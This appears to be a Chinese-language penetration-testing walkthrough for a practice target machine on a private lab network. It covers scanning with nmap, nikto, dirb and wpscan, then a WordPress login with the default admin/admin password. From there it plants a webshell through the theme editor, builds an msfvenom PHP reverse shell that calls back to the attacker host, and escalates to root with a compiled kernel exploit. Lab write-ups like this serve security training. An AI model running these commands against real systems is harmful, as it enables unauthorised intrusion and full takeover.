高难度渗透靶机
1、扫描靶机信息
nmap -sV 192.168.222.130
nmap -A -v -T4 192.168.222.130
nikto -host 192.168.222.130 //扫描网站目录
dirb http://192.168.222.130 //扫描关键信息
由于wordpress文件,判断是否是某个CMS,是否具有可以直接利用的漏洞; wpscan -url url -enumerate at -enumerate ap --enumerate u wordpress基于php的CMS管理系统 wpscan --url http://192.168.222.130/wordpress --enumerate at --enumerate ap --enumerate u
对网页进行弱密码测试
1、192.168.222.128/wordpress/login.php
弱密码 admin admin登录成功
2、点击Appearance > Editor > 编辑可以上传的webshell
使用msfvenom生成可以接受到msf的回弹shell msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.222.128 lport=4444 -f raw > /root/shell.php
上传成功之后访问该404网页
在msf中接受回弹结果
msfconsole use exploit/multi/handler set payload php/meterpreter/reverse_tcp //设置payload set lhost 192.168.222.128 //设置回弹攻击机的IP地址 set lport 4444 //设置回弹的端口
查看该系统的内核版本,进行内核渗透
sysinfo 查看系统信息 利用searchsploit Linux ubuntu 4.4.0 查看内核版本漏洞的exp
使用这个exp
gcc 41458.c -o shell gcc编译完之后输出shell 在meterpreter上传刚才编译好的文件 upload shell
chmod 777 shell //给与其最高权限 ./shell //运行该程序 获得root权限